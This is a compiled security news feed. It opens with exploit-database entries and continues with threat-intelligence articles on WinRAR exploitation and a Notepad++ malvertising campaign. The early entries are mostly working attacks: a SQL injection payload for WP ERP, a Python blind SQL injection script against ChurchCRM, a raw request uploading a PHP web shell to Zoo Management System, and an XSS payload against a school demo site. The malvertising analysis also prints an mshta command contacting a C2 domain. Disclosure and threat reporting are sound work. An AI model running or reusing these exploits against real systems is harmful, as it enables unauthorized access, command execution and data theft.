WordPress WP ERP plugin versions 1.12.2 and below suffer from a remote SQL injection vulnerability.

    # Exploit Title: WP Plugins WP ERP <= 1.12.2 - SQL Injection# Date: 15-10-2023# Exploit Author: Arvandy# Software Link: https://wordpress.org/plugins/erp/# Vendor Homepage: https://wperp.com/# Version: 1.12.2# Tested on: Windows, Linux# CVE: CVE-2023-2744# Product DescriptionWP ERP is the first full-fledged ERP (Enterprise Resource Planning) system through which you can simultaneously manage your WordPress site and business from a single platform. WP ERP aims to deliver all your enterprise business requirements with simplicity. With real-time reports and a better way to handle business data, make your operation better managed, away from errors, and prepare your company for the next leap. WP ERP has 3 core modules: HR, CRM, and Accounting, which together make a complete ERP system for any type of business.# Vulnerability overview:The WordPress Plugins WP ERP - Accounting module <= 1.12.2 is vulnerable to Blind SQL Injection (time-based) via the TYPE parameter on /wp-json/erp/v1/accounting/v1/people endpoint. This vulnerability could lead to unauthorized data access and modification.# Proof of Concept:Affected Endpoint: /wp-json/erp/v1/accounting/v1/people?type=Affected Parameter: typepayload: customer') AND (SELECT 1 FROM (SELECT SLEEP(3))x) AND ('x'='x# RecommendationUpgrade to version 1.12.4

WordPress WP ERP 1.12.2 SQL Injection

ChurchCRM version 4.5.4 suffers from a remote authenticated blind SQL injection vulnerability.

    # Exploit Title: ChurchCRM 4.5.4 - Authenticated Blind SQL Injection via the EN_tyid# Date: 03-05-2023# Exploit Author: Arvandy# Blog Post: https://github.com/arvandy/CVE/blob/main/CVE-2023-29842/CVE-2023-29842.md# Software Link: https://github.com/ChurchCRM/CRM/releases# Vendor Homepage: http://churchcrm.io/# Version: 4.5.4# Tested on: Windows, Linux# CVE: CVE-2023-29842"""The endpoint /EditEventTypes.php is vulnerable to Blind SQL Injection (Time-based) via the EN_tyid POST parameter.This endpoint can be triggered through the following menu: Events - List Event Types - Edit Event Types - Save Name. The EN_tyid Parameter is taken directly from the user input and passed into the SQL query without any sanitization or input escaping. This allows the attacker to inject malicious Event payloads to execute the malicious SQL query.This script is created as Proof of Concept to retrieve the database name and version."""import sys, requestsdef injection(target, inj_str, session_cookies):        for j in range(32, 126):        url = "%s/EditEventTypes.php" % (target)        headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'CRM-2c90cf299230a50dab55aee824ed9b08='+str(session_cookies)}            data = "EN_tyid=%s&EN_ctid=&newEvtName=NewEvent&Action=NAME&newEvtStartTime=09:30:00&newCountName=" % (inj_str.replace("[CHAR]", str(j)))        r = requests.post(url, headers=headers, data=data)        res = r.text        if (r.elapsed.total_seconds () > 2 ):            return j    return Nonedef retrieveDBName(session_cookies):       db_name = ""    print("(+) Retrieving database name, please wait")    for i in range (1,100):        injection_str = "1'+UNION+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,IF(ASCII(SUBSTRING((SELECT+DATABASE()),%d,1))=[CHAR],SLEEP(2),null)-- -" % i        retrieved_value = injection(target, injection_str, session_cookies)        if (retrieved_value):            sys.stdout.write(chr(retrieved_value))            sys.stdout.flush()                   else:            breakdef retrieveDBVersion(session_cookies):       db_version = ""    print("(+) Retrieving database version, please wait")    for i in range (1,100):        injection_str = "1'+UNION+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,IF(ASCII(SUBSTRING((SELECT+@@version),%d,1))=[CHAR],SLEEP(2),null)-- -" % i        retrieved_value = injection(target, injection_str, session_cookies)        if (retrieved_value):            sys.stdout.write(chr(retrieved_value))            sys.stdout.flush()        else:            break    def login(target, username, password):    target = "%s/session/begin" % (target)    headers = {'Content-Type': 'application/x-www-form-urlencoded'}    data = "User=%s&Password=%s" % (username, password)    s = requests.session()    r = s.post(target, data = data, headers = headers)    return s.cookies.get('CRM-2c90cf299230a50dab55aee824ed9b08')def main():    print("(!) Login to the target application")    session_cookies = login(target, username, password)               print("(!) Exploiting the Blind Auth SQL Injection to retrieve database name and versions")    retrieveDBName(session_cookies)        print("")    retrieveDBVersion(session_cookies)    if __name__ == "__main__":    if len(sys.argv) != 4:        print("(!) Usage: python3 exploit.py <URL> <username> <password>")        print("(!) E.g.,: python3 exploit.py http://192.168.1.100/ChurchCRM user pass")        sys.exit(-1)    target = sys.argv[1]    username = sys.argv[2]    password = sys.argv[3]        main()

ChurchCRM 4.5.4 SQL Injection

Zoo Management System version 1.0 suffers from a remote shell upload vulnerability. This version originally had a shell upload vulnerability discovered by D4rkP0w4r that leveraged the upload CV flow but this particular finding leverages the save_animal flow.

# Exploit Title: Zoo Management System 1.0 - Unauthenticated RCE  
# Date: 16.10.2023  
# Exploit Author: Çağatay Ceyhan  
# Vendor Homepage: https://www.sourcecodester.com/php/15347/zoo-management-system-source-code-php-mysql-database.html#google_vignette  
# Software Link: https://www.sourcecodester.com/download-code?nid=15347&title=Zoo+Management+System+source+code+in+PHP+with+MySQL+Database  
# Version: 1.0  
# Tested on: Windows 11

## Unauthenticated users can access /zoomanagementsystem/admin/public_html/save_animal address and they can upload malicious php file instead of animal picture image without any authentication.

POST /zoomanagementsystem/admin/public_html/save_animal HTTP/1.1  
Host: localhost  
Content-Length: 6162  
Cache-Control: max-age=0  
sec-ch-ua: "Chromium";v="117", "Not;A=Brand";v="8"  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: "Windows"  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8NY8zT5dXIloiUML  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://localhost/zoomanagementsystem/admin/public_html/save_animal  
Accept-Encoding: gzip, deflate, br  
Accept-Language: en-US,en;q=0.9  
Connection: close

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="animal_id"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_given_name"

kdkd  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_species_name"

ıdsıd  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_dob"

1552-02-05  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_gender"

m  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_avg_lifespan"

3  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="class_id"

2  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="location_id"

2  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_dietary_req"

2  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_natural_habitat"

faad  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_pop_dist"

eterter  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_joindate"

5559-02-06  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_height"

2  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_weight"

3  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_description"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="images[]"; filename="ultra.php"  
Content-Type: application/octet-stream

<?php  
if (!empty($_POST['cmd'])) {  
    $cmd = shell_exec($_POST['cmd']);  
}  
?>  
<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="utf-8">  
    <meta http-equiv="X-UA-Compatible" content="IE=edge">  
    <meta name="viewport" content="width=device-width, initial-scale=1">  
    <title>Web Shell</title>  
    <style>  
        * {  
            -webkit-box-sizing: border-box;  
            box-sizing: border-box;  
        }

        body {  
            font-family: sans-serif;  
            color: rgba(0, 0, 0, .75);  
        }

        main {  
            margin: auto;  
            max-width: 850px;  
        }

        pre,  
        input,  
        button {  
            padding: 10px;  
            border-radius: 5px;  
            background-color: #efefef;  
        }

        label {  
            display: block;  
        }

        input {  
            width: 100%;  
            background-color: #efefef;  
            border: 2px solid transparent;  
        }

        input:focus {  
            outline: none;  
            background: transparent;  
            border: 2px solid #e6e6e6;  
        }

        button {  
            border: none;  
            cursor: pointer;  
            margin-left: 5px;  
        }

        button:hover {  
            background-color: #e6e6e6;  
        }

        .form-group {  
            display: -webkit-box;  
            display: -ms-flexbox;  
            display: flex;  
            padding: 15px 0;  
        }  
    </style>

</head>

<body>  
    <main>  
        <h1>Web Shell</h1>  
        <h2>Execute a command</h2>

        <form method="post">  
            <label for="cmd"><strong>Command</strong></label>  
            <div class="form-group">  
                <input type="text" name="cmd" id="cmd" value="<?= htmlspecialchars($_POST['cmd'], ENT_QUOTES, 'UTF-8') ?>"  
                       onfocus="this.setSelectionRange(this.value.length, this.value.length);" autofocus required>  
                <button type="submit">Execute</button>  
            </div>  
        </form>

        <?php if ($_SERVER['REQUEST_METHOD'] === 'POST'): ?>  
            <h2>Output</h2>  
            <?php if (isset($cmd)): ?>  
                <pre><?= htmlspecialchars($cmd, ENT_QUOTES, 'UTF-8') ?></pre>  
            <?php else: ?>  
                <pre><small>No result.</small></pre>  
            <?php endif; ?>  
        <?php endif; ?>  
    </main>  
</body>  
</html>  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_med_record"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_transfer"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_transfer_reason"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_death_date"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_death_cause"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_incineration"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="m_gest_period"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="m_category"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="m_avg_body_temp"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="b_nest_const"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="b_clutch_size"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="b_wingspan"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="b_color_variant"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="f_body_temp"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="f_water_type"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="f_color_variant"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="rep_type"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="clutch_size"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="num_offspring"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="submit"

------WebKitFormBoundary8NY8zT5dXIloiUML--

## After the post request sent by an attacker, the malicious file can be seen under the http://localhost/zoomanagementsystem/img/animals/. the attacker can execute arbitrary command on http://localhost/zoomanagementsystem/img/animals/ultra_1697442648.php.

Zoo Management System 1.0 Shell Upload

2023 Mount Carmel School version 6.4.1 suffers from a cross site scripting vulnerability.

## Title: 2023-Mount-Carmel-School-6.4.1 XSS-Reflected - User Interaction  
## Author: nu11secur1ty  
## Date: 10/14/2023  
## Vendor: https://smart-school.in/  
## Software: https://demo.smart-school.in/site/userlogin#  
## Reference: https://portswigger.net/kb/issues/00200300_cross-site-scripting-reflected

## Description:  
The user can manipulate the system by injecting an HTML code into the  
system without any restriction.  
The function apply_leave is not sanitizing correctly. This could allow  
the user to inject this  
application by using HTML or Java Script with very malicious purposes etc...

STATUS: HIGH- Vulnerability

[+]Exploit:  
```HTML  
POST /user/apply_leave/add HTTP/1.1  
Host: demo.smart-school.in  
Cookie: ci_session=495u2fpup87iml75p4us2uuqgqkpsof9  
Content-Length: 1492  
Sec-Ch-Ua: "Chromium";v="117", "Not;A=Brand";v="8"  
Accept: application/json, text/javascript, */*; q=0.01  
Content-Type: multipart/form-data;  
boundary=----WebKitFormBoundary5wuzslDN9siOCW0K  
X-Requested-With: XMLHttpRequest  
Sec-Ch-Ua-Mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132  
Safari/537.36  
Sec-Ch-Ua-Platform: "Windows"  
Origin: https://demo.smart-school.in  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://demo.smart-school.in/user/apply_leave  
Accept-Encoding: gzip, deflate, br  
Accept-Language: en-US,en;q=0.9  
Connection: close

------WebKitFormBoundary5wuzslDN9siOCW0K  
Content-Disposition: form-data; name="homework_id"

------WebKitFormBoundary5wuzslDN9siOCW0K  
Content-Disposition: form-data; name="apply_date"

10/14/2023  
------WebKitFormBoundary5wuzslDN9siOCW0K  
Content-Disposition: form-data; name="from_date"

09/27/2023  
------WebKitFormBoundary5wuzslDN9siOCW0K  
Content-Disposition: form-data; name="to_date"

09/29/2023  
------WebKitFormBoundary5wuzslDN9siOCW0K  
Content-Disposition: form-data; name="leave_id"

------WebKitFormBoundary5wuzslDN9siOCW0K  
Content-Disposition: form-data; name="message"

<a href="https://www.youtube.com/watch?v=yPuC4Cy2ZuI" target="_blank"  
rel="noopener nofollow ugc">  
<img src="https://raw.githubusercontent.com/nu11secur1ty/XSSight/master/nu11secur1ty/images/chalga-tochilka.gif"  
style="border:1px solid black;max-width:100%;" alt="Photo of Byron  
Bay, one of Australia's best beaches!">  
------WebKitFormBoundary5wuzslDN9siOCW0K  
Content-Disposition: form-data; name="files[]"; filename="kurec.svg"  
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>  
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"  
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"  
stroke="#004400"/>  
   <script type="text/javascript">  
      alert(document.cookie);  
   </script>  
</svg>

------WebKitFormBoundary5wuzslDN9siOCW0K--

```

## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/smart-school.in/2023/Mount-Carmel-School-6.4.1)

## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2023/10/2023-mount-carmel-school-641-xss.html)

## Time spent:  
00:37:00

2023 Mount Carmel School 6.4.1 Cross Site Scripting

The Microsoft Windows Kernel passes user-mode pointers to registry callbacks, leading to race conditions and memory corruption.

Microsoft Windows Kernel Race Condition / Memory Corruption

Pro-Russian hacking groups have exploited a recently disclosed security vulnerability in the WinRAR archiving utility as part of a phishing campaign designed to harvest credentials from compromised systems.
"The attack involves the use of malicious archive files that exploit the recently discovered vulnerability affecting the WinRAR compression software versions prior to 6.23 and traced as

Pro-Russian hacking groups have exploited a recently disclosed security vulnerability in the WinRAR archiving utility as part of a phishing campaign designed to harvest credentials from compromised systems.

"The attack involves the use of malicious archive files that exploit the recently discovered vulnerability affecting the WinRAR compression software versions prior to 6.23 and traced as CVE-2023-38831," Cluster25 said in a report published last week.

The archive contains a booby-trapped PDF file that, when clicked, causes a Windows Batch script to be executed, which launches PowerShell commands to open a reverse shell that gives the attacker remote access to the targeted host.

Also deployed is a PowerShell script that steals data, including login credentials, from the Google Chrome and Microsoft Edge browsers. The captured information is exfiltrated via a legitimate web service webhook\[.\]site.

CVE-2023-38831 refers to a high-severity flaw in WinRAR that allows attackers to execute arbitrary code upon attempting to view a benign file within a ZIP archive. Findings from Group-IB in August 2023 disclosed that the bug had been weaponized as a zero-day since April 2023 in attacks targeting traders.

The development comes as Google-owned Mandiant charted Russian nation-state actor APT29's "rapidly evolving" phishing operations targeting diplomatic entities amid an uptick in tempo and an emphasis on Ukraine in the first half of 2023.

The substantial changes in APT29's tooling and tradecraft are "likely designed to support the increased frequency and scope of operations and hinder forensic analysis," the company said, and that it has "used various infection chains simultaneously across different operations."

Some of the notable changes include the use of compromised WordPress sites to host first-stage payloads as well as additional obfuscation and anti-analysis components.

AT29, which has also been linked to cloud-focused exploitation, is one of the many activity clusters originating from Russia that have singled out Ukraine following the onset of the war early last year.

In July 2023, the Computer Emergency Response Team of Ukraine (CERT-UA) implicated Turla in attacks deploying the Capibar malware and Kazuar backdoor for espionage attacks on Ukrainian defensive assets.

"The Turla group is a persistent adversary with a long history of activities. Their origins, tactics, and targets all indicate a well-funded operation with highly skilled operatives," Trend Micro disclosed in a recent report. "Turla has continuously developed its tools and techniques over years and will likely keep on refining them."

Ukrainian cybersecurity agencies, in a report last month, also revealed that Kremlin-backed threat actors targeted domestic law enforcement entities to collect information about Ukrainian investigations into war crimes committed by Russian soldiers.

"In 2023, the most active groups were UAC-0010 (Gamaredon/FSB), UAC-0056 (GRU), UAC-0028 (APT28/GRU), UAC-0082 (Sandworm/GRU), UAC-0144 / UAC-0024 / UAC-0003 (Turla), UAC-0029 (APT29/ SVR), UAC-0109 (Zarya), UAC-0100, UAC-0106 (XakNet), \[and\] UAC-0107 (CyberArmyofRussia)," the State Service of Special Communications and Information Protection of Ukraine (SSSCIP) said.

CERT-UA recorded 27 "critical" cyber incidents in H1 of 2023, compared to 144 in the second half of 2022 and 319 in the first half of 2022. In total, destructive cyber-attacks affecting operations fell from 518 to 267.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Pro-Russian Hackers Exploiting Recent WinRAR Vulnerability in New Campaign

Categories: Threat Intelligence
Tags: malvertising

Tags: ads

Tags: notepad

Tags: hta

Tags: malware

Tags: google

A sophisticated threat actor has been using Google ads to deliver custom malware payloads to victims for months while flying under the radar.



(Read more...)




The post The forgotten malvertising campaign appeared first on Malwarebytes Labs.

In recent weeks, we have noted an increase in malvertising campaigns via Google searches. Several of the threat actors we are tracking have improved their techniques to evade detection throughout the delivery chain.

We believe this evolution will have a real world impact among corporate users getting compromised via malicious ads eventually leading to the deployment of malware and ransomware.

In this blog post, we look at a malvertising campaign that seems to have flown under the radar entirely for at least several months. It is unique in its way to fingerprint users and distribute time sensitive payloads.

**Malicious ads for Notepad++**

The threat actor is running a campaign targeting Notepad++, a popular text editor for Windows as well as similar software programs such as PDF converters. The image below is a collage of malicious ads we observed recently, all run by the same threat actor but via different ad accounts, likely compromised.

A first level of filtering happens when the user clicks on one of these ads. This is likely an IP check that discards VPNs and other non genuine IP addresses and instead shows a decoy site:

However, intended targets will see a replica of the real Notepad++ website hosted at notepadxtreme\[.\]com:

**Fingerprinting for VM detection**

A second level of filtering happens when the user clicks on the download link where JavaScript code performs a system fingerprint. We had previously observed some malvertising campaigns check for the presence of emulators or virtual machines and this is what happens here also, although the code being used is different and more complex.

If any of the checks don't match, the user is being redirected to the legitimate Notepad++ website. Each potential victim is assigned a unique ID that will allow them to download the payload.

**Custom, time-sensitive download**

Another thing that sets apart this campaign from others is the way the payload is being downloaded. Each user is given a unique ID with the following format:

CukS1=\[10 character string\]\[13 digits\]

This is likely for tracking purposes but also to make each download unique and time sensitive.

Unlike other malvertising campaigns the payload is a _.hta_ script. It follows the same naming convention seen above with the download URL:

Notepad\_Ver\_\[10 character string\]\[13 digits\].hta

Attempting to download the file again from the same URL results in an error:

**.HTA Payload**

The .hta file we captured during our investigation was not fully weaponized. However, we were able to find another one that was uploaded to VirusTotal in early July. It uses the same naming convention and we can see the lure was "PDF Converter" instead of Notepad++.

The script is well obfuscated and shows 0 detection on VirusTotal. However, upon dynamic analysis, there is a connection to a remote domain (mybigeye\[.\]icu) on a custom port:

C:\\Windows\\SysWOW64\\mshta.exe "C:\\Windows\\System32\\mshta.exe"   
https://mybigeye .icu:52054/LXGZlAJgmvCaQfer/rWABCTDEqFVGdHIQ.html?client\_id=jurmvozdcf1687983013426#he7HAp1X4cgqv5SJykr3lRtaxijL0WPB6sdGnZC9IouwDKf8OEMQTFNbmYzU2V+/=

We also notice it uses the same client\_id stored in the filename when making that remote connection.

While we don't know what happens next, we believe this is part of malicious infrastructure used by threat actors to gain access to victims' machines using tools such as Cobalt Strike.

**Innovation makes malvertising a greater threat**

We have observed an increase in the volume of malvertising campaigns but also in their sophistication over the past several months. Threat actors are successfully applying evasion techniques that bypass ad verification checks and allow them to target certain types of victims.

With a reliable malware delivery chain in hand, malicious actors can focus on improving their decoy pages and craft custom malware payloads. This is another space where we see some innovation and where security vendors are currently running behind.

Threat intelligence is a critical part of a defensive strategy to better understand the threat landscape in order to protect users. For example, tracking malicious ads allows us to quickly identify the infrastructure used by threat actors and immediately block it. Following the malware delivery chain shows us any new techniques that may bypass current security products and helps us to adjust our detections accordingly.

**Indicators of Compromise**

Ad domains:

switcodes\[.\]com  
karelisweb\[.\]com  
jquerywins\[.\]com  
mojenyc\[.\]com

Fake Notepad++ site:

notepadxtreme\[.\]com

Script C2:

mybigeye\[.\]icu

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

The forgotten malvertising campaign

Congratulations to all the researchers recognized in this quarter’s Microsoft Researcher Recognition Program leaderboard! Thank you to everyone for your hard work and continued partnership to secure customers.
The top three researchers of the 2023 Q3 Security Researcher Leaderboard are Wei, VictorV, and Anonymous!
Check out the full list of researchers recognized this quarter here.

Congratulations to all the researchers recognized in this quarter’s Microsoft Researcher Recognition Program leaderboard! Thank you to everyone for your hard work and continued partnership to secure customers.

The top three researchers of the 2023 Q3 Security Researcher Leaderboard are **Wei, VictorV, and Anonymous!**

Check out the full list of researchers recognized this quarter here.

Congratulations to the top Azure researchers this quarter: **Wei, VictorV, Suresh Chelladurai!**

Congratulations to the top Office researchers this quarter: **Brad Schlintz, Harun Can, Disclosures!**

Congratulations to the top Windows researchers this quarter: **Jarvis\_1oop, k0shl, Anonymous!**

This 2023 Q3 leaderboard reflects point values for cases that are:

*   Submitted and assessed by the MSRC team between July 1, 2023, and September 30, 2023
*   Submitted and assessed by the MSRC team between April 1, 2023, and June 30, 2023 (last program period), but assessed after July 1, 2023

Past quarterly leaderboard announcements:

*   MSRC 2023 Q2 Security Researcher Leaderboard
*   MSRC 2023 Q1 Security Researcher Leaderboard
*   MSRC 2022 Q4 Security Researcher Leaderboard
*   MSRC 2022 Q3 Security Researcher Leaderboard
*   MSRC 2022 Q2 Security Researcher Leaderboard
*   MSRC 2022 Q1 Security Researcher Leaderboard
*   MSRC 2021 Q4 Security Researcher Leaderboard
*   MSRC 2021 Q3 Security Researcher Leaderboard

Keep up the awesome work and we look forward to seeing you next quarter!

_Madeline Eckert, MSRC_

Congratulations to the Top MSRC 2023 Q3 Security Researchers!

Categories: News
A list of topics we covered in the week of October 9 to October 15 of 2023



(Read more...)




The post A week in security (October 9 - October 15) appeared first on Malwarebytes Labs.

Cybersecurity info you can't do without

Want to stay informed on the latest news in cybersecurity? Sign up for our newsletter and learn how to protect your computer from threats.

Cyberprotection for every one.

For Personal

Windows Antivirus

Mac Antivirus

Android Antivirus

Free Antivirus

VPN App (All Devices)

Malwarebytes for iOS

See all

Company

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

FOR BUSINESS

Small Businesses

Mid-size Businesses

Large Enterprise

Endpoint Protection

Endpoint Detection & Response

Managed Detection and Response (MDR)

FOR PARTNERS

Managed Service Provider (MSP) Program

Resellers

MY ACCOUNT

Sign In

SOLUTIONS

Rootkit Scanner

Trojan Scanner

Virus Scanner

Spyware Scanner  

Password Generator

Anti Ransomware Protection

ADDRESS

3979 Freedom Circle  
12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay  
2nd Floor  
Cork T12 X8N6  
Ireland

LEARN

Malware

Hacking

Phishing

Ransomware

Computer Virus

Antivirus  

What is VPN?

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

MY ACCOUNT

Sign In

ADDRESS

3979 Freedom Circle, 12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay, 2nd Floor  
Cork T12 X8N6  
Ireland

A week in security (October 9 - October 15)

IBM App Connect Enterprise 11.0.0.1 through 11.0.0.23, 12.0.1.0 through 12.0.10.0 and IBM Integration Bus 10.1 through 10.1.0.1 are vulnerable to a denial of service for integration nodes on Windows.  IBM X-Force ID:  247998.

Tag

#windows